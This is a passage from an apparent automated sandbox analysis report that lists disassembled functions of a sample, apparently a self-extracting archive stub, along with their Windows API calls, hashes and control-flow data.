                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004DD29D
                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004DD2D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: EnvironmentVariable
                    • String ID: sfxcmd$sfxpar
                    • API String ID: 1431749950-3493335439
                    • Opcode ID: 458e07c77843ae76f867ef16de4150d48d10a7eab627f6f3b67d69eabfd5accd
                    • Instruction ID: dea0136451d3d26c1d9d941d5521231edeb3d236d5d86952e65f47bc913436fe
                    • Opcode Fuzzy Hash: 458e07c77843ae76f867ef16de4150d48d10a7eab627f6f3b67d69eabfd5accd
                    • Instruction Fuzzy Hash: 7EF0A77690022CA6C7202F959C19FBA7759AF09742B00006BFD4566341DB6CCD50D6F9
                    Function 004C984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1024 4c984e-4c985a 1025 4c985c-4c9864 GetStdHandle 1024->1025 1026 4c9867-4c987e ReadFile 1024->1026 1025->1026 1027 4c98da 1026->1027 1028 4c9880-4c9889 call 4c9989 1026->1028 1029 4c98dd-4c98e2 1027->1029 1032 4c988b-4c9893 1028->1032 1033 4c98a2-4c98a6 1028->1033 1032->1033 1034 4c9895 1032->1034 1035 4c98a8-4c98b1 GetLastError 1033->1035 1036 4c98b7-4c98bb 1033->1036 1037 4c9896-4c98a0 call 4c984e 1034->1037 1035->1036 1038 4c98b3-4c98b5 1035->1038 1039 4c98bd-4c98c5 1036->1039 1040 4c98d5-4c98d8 1036->1040 1037->1029 1038->1029 1039->1040 1042 4c98c7-4c98d0 GetLastError 1039->1042 1040->1029 1042->1040 1043 4c98d2-4c98d3 1042->1043 1043->1037
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 004C985E
                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 004C9876
                    • GetLastError.KERNEL32 ref: 004C98A8
                    • GetLastError.KERNEL32 ref: 004C98C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast$FileHandleRead
                    • String ID:
                    • API String ID: 2244327787-0
                    • Opcode ID: a936cf1f7be0f475d86203d868415b66a4ea507339bad1e3dc6f843a0cedccec
                    • Instruction ID: 0114ff84c06fc4feb48f475714e4ccecba29a01bb7050316372f6dbcd99817f7
                    • Opcode Fuzzy Hash: a936cf1f7be0f475d86203d868415b66a4ea507339bad1e3dc6f843a0cedccec
                    • Instruction Fuzzy Hash: 27115139920204FFDB606F51C808F7A77A8EB06731F14852FE46A87694DB39DD409F6A
                    Function 004EA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004CCFE0,00000000,00000000,?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue), ref: 004EA526
                    • GetLastError.KERNEL32(?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue,004F7348,004F7350,00000000,00000364,?,004E9077), ref: 004EA532
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue,004F7348,004F7350,00000000), ref: 004EA540
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 02a82c6a70378ac457320d57bc2793ec7a44ec2a6c7cf2d1e9fc1cc075f5b1d9
                    • Instruction ID: 7685cfda53ede0db36189b9dd4411b381d873f6232b5edaf8aa10100132213eb
                    • Opcode Fuzzy Hash: 02a82c6a70378ac457320d57bc2793ec7a44ec2a6c7cf2d1e9fc1cc075f5b1d9
                    • Instruction Fuzzy Hash: 1101F732711272BBC7218F6A9C44A677B58AF55BA37140632F906D3240DB39F921CBED
                    Function 004EB188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004E8FA5: GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                      • Part of subcall function 004E8FA5: _free.LIBCMT ref: 004E8FDC
                      • Part of subcall function 004E8FA5: SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                      • Part of subcall function 004E8FA5: _abort.LIBCMT ref: 004E9023
                      • Part of subcall function 004EB2AE: _abort.LIBCMT ref: 004EB2E0
                      • Part of subcall function 004EB2AE: _free.LIBCMT ref: 004EB314
                      • Part of subcall function 004EAF1B: GetOEMCP.KERNEL32(00000000,?,?,004EB1A5,?), ref: 004EAF46
                    • _free.LIBCMT ref: 004EB200
                    • _free.LIBCMT ref: 004EB236
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorLast_abort
                    • String ID: O
                    • API String ID: 2991157371-4042636462
                    • Opcode ID: 5fca13d5a823a3791950fc8fd730a07720e89bd355f2dda9c5e9a3f028ab89d5
                    • Instruction ID: 15d8cbf04cee53621da165a243d8b338d8e62a9dc6ffc1494a40bc5008341ec2
                    • Opcode Fuzzy Hash: 5fca13d5a823a3791950fc8fd730a07720e89bd355f2dda9c5e9a3f028ab89d5
                    • Instruction Fuzzy Hash: CD31F531900284AFDB10EF9BC845A6FB7E1EF40326F24409FE5045B2A1EB395D41CB88
                    Function 004C9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,004CCC94,00000001,?,?,?,00000000,004D4ECD,?,?,?), ref: 004C9F4C
                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,004D4ECD,?,?,?,?,?,004D4972,?), ref: 004C9F8E
                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,004CCC94,00000001,?,?), ref: 004C9FB8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileWrite$Handle
                    • String ID:
                    • API String ID: 4209713984-0
                    • Opcode ID: 082bdc0169d247a79be7d77bdf3f717e156b7da14c1265d1162869cbb6df9b46
                    • Instruction ID: 981223981723ac13d88a4a32675670e549d0debef06bca258ddf0afd8b766528
                    • Opcode Fuzzy Hash: 082bdc0169d247a79be7d77bdf3f717e156b7da14c1265d1162869cbb6df9b46
                    • Instruction Fuzzy Hash: 58310575208305ABDF608F14D948F6BBBA4EB40755F04456EF945DB281CB78DC48CBBA
                    Function 004CA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA22E
                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA261
                    • GetLastError.KERNEL32(?,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA27E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CreateDirectory$ErrorLast
                    • String ID:
                    • API String ID: 2485089472-0
                    • Opcode ID: 941602fa43bbf680b3a21da82f6ae051190605cbbc3fb9a12de4562d15d3f1b3
                    • Instruction ID: 55bfdaf2d06e3e2dc6acc18ba498748820493a53ca2b32f6e6a21a618a3df928
                    • Opcode Fuzzy Hash: 941602fa43bbf680b3a21da82f6ae051190605cbbc3fb9a12de4562d15d3f1b3
                    • Instruction Fuzzy Hash: 2D01A12914112C65DBA1AB759C09FEA3358AB06749F08049FF800D5351CA6DCA61C6AF
                    Function 004EAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004EB019
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Info
                    • String ID:
                    • API String ID: 1807457897-3916222277
                    • Opcode ID: 5be333a72196adc3a7b571c397bf7c918e2df381843247443b64f3bdb5933692
                    • Instruction ID: 5dd810b07d980fdb08ac7e289227e39290becb6c7915098f7062410b5b99013f
                    • Opcode Fuzzy Hash: 5be333a72196adc3a7b571c397bf7c918e2df381843247443b64f3bdb5933692
                    • Instruction Fuzzy Hash: A9414A705043CC9ADF218E268C94BF7BBA9DF45305F1404EEE59A87242D339AE46CFA4
                    Function 004EA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 004EA79D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx
                    • API String ID: 2568140703-3893581201
                    • Opcode ID: 5b32bd1d5719c447ff94c31994679a14f18e27595d0cd8463b6214b91d918975
                    • Instruction ID: 51e8904610cf1cdf985e8f762fe73c3e46e3b4e546dc10cc29cc0bbe546757dc
                    • Opcode Fuzzy Hash: 5b32bd1d5719c447ff94c31994679a14f18e27595d0cd8463b6214b91d918975
                    • Instruction Fuzzy Hash: A901483250420CBBCF02AFA2DC01DEE3F66EF08711F014156FE1425160CA3AD931EB9A
                    Function 004EA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004E9D2F), ref: 004EA715
                    Strings
                    • InitializeCriticalSectionEx, xrefs: 004EA6E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2593887523-3084827643
                    • Opcode ID: 6bb9e33e259f9d70ff47ad2ab589ea48ee5393d7c87a097b156c3e5402212be9
                    • Instruction ID: 8f25a107af983019027de429c9abb780d1ed83d922761c8d33deefaa90fe3f4c
                    • Opcode Fuzzy Hash: 6bb9e33e259f9d70ff47ad2ab589ea48ee5393d7c87a097b156c3e5402212be9
                    • Instruction Fuzzy Hash: 4BF0593060420CBBCB006F52CC05DBE7F60EF04721B004066FD085A360CA39AE30E789
                    Function 004EA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Alloc
                    • String ID: FlsAlloc
                    • API String ID: 2773662609-671089009
                    • Opcode ID: c9f74d7221b21057516df9a82d39e562ffecfe477718683e5eb6c8a922497cd9
                    • Instruction ID: ee822efadb6966fa46d12e2d6c4fa0a57f0c6b0436a93a254eabc84185b030ab
                    • Opcode Fuzzy Hash: c9f74d7221b21057516df9a82d39e562ffecfe477718683e5eb6c8a922497cd9
                    • Instruction Fuzzy Hash: 75E02030A4522CBBD2106B629C02ABEBA50CB14B12B51006BFD045A240CD682A21D2DE
                    Function 004E329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 004E32AF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: try_get_function
                    • String ID: FlsAlloc
                    • API String ID: 2742660187-671089009
                    • Opcode ID: 338e3e5077c0c5eb94e99f6df0b3c79695a0412a654c7ca6613531651fbfa0e4
                    • Instruction ID: 2da79390947cda3624a48572257b91024009f692cdf77c49cea3394713f361c9
                    • Opcode Fuzzy Hash: 338e3e5077c0c5eb94e99f6df0b3c79695a0412a654c7ca6613531651fbfa0e4
                    • Instruction Fuzzy Hash: B0D0C231781A786AE11136826C02ABABA048F01FB7B4501A3FF0C9A2428469451041CD
                    Function 004EB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004EAF1B: GetOEMCP.KERNEL32(00000000,?,?,004EB1A5,?), ref: 004EAF46
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004EB1EA,?,00000000), ref: 004EB3C4
                    • GetCPInfo.KERNEL32(00000000,004EB1EA,?,?,?,004EB1EA,?,00000000), ref: 004EB3D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID:
                    • API String ID: 546120528-0
                    • Opcode ID: 2970004c5ed9fad09846d2d8bcc3ecbb40fa38f9df72169d632ef9fec01f11df
                    • Instruction ID: 0359b95c5070294bc0a972bebda24f9ff1d9191789588ff4a0cf74b1bcb00247
                    • Opcode Fuzzy Hash: 2970004c5ed9fad09846d2d8bcc3ecbb40fa38f9df72169d632ef9fec01f11df
                    • Instruction Fuzzy Hash: 405125709002959EDB209F77C8816BBBBE5EF41316F18406FD49687293D73DA542CBC9
                    Function 004D2C42 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D2DA4
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D2DBC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: a6af875a5f4662bd307c249f127de44dfcc4c10ac9d0d0b29aff031aa3926c78
                    • Instruction ID: c72fbfcbfd537580adde4296682e8866b206983f156cf28dcd932321a308950c
                    • Opcode Fuzzy Hash: a6af875a5f4662bd307c249f127de44dfcc4c10ac9d0d0b29aff031aa3926c78
                    • Instruction Fuzzy Hash: D74114B0A087816BD728EE75D6A879AF794BFA4304F04052FE55943342C7BCA848C79E
                    Function 004C1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C6057: __EH_prolog.LIBCMT ref: 004C605C
                      • Part of subcall function 004CC827: __EH_prolog.LIBCMT ref: 004CC82C
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC86F
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC893
                    • new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 16a8fe00a236b1412945059ba6074ebc447e4f565f961e451fea4e32006f55ec
                    • Instruction ID: 23d624908a6db3c55f3c1d47020c1ddd923eb635fddd1e69cb58da1649c1d5ce
                    • Opcode Fuzzy Hash: 16a8fe00a236b1412945059ba6074ebc447e4f565f961e451fea4e32006f55ec
                    • Instruction Fuzzy Hash: 7B4176B4805B409ED724DF7A8485AE7FBE5FB18304F504A6FD6EE83282CB362554CB19
                    Function 004C1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C6057: __EH_prolog.LIBCMT ref: 004C605C
                      • Part of subcall function 004CC827: __EH_prolog.LIBCMT ref: 004CC82C
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC86F
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC893
                    • new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 52a02a06d5a5992d18b75f2dc43d422d046a7aee51b89f4397e9d76b43fa4d10
                    • Instruction ID: d063cbbaae061e4b932207d35e38cb06b19abec7db932b87df387b1289b33dcc
                    • Opcode Fuzzy Hash: 52a02a06d5a5992d18b75f2dc43d422d046a7aee51b89f4397e9d76b43fa4d10
                    • Instruction Fuzzy Hash: 644165B4805B409EE724DF7A8485AE7FAE5FB19304F504A6FD1EE83282CB362554CB19
                    Function 004C971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004C9EDC,?,?,004C7867), ref: 004C97A6
                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004C9EDC,?,?,004C7867), ref: 004C97DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
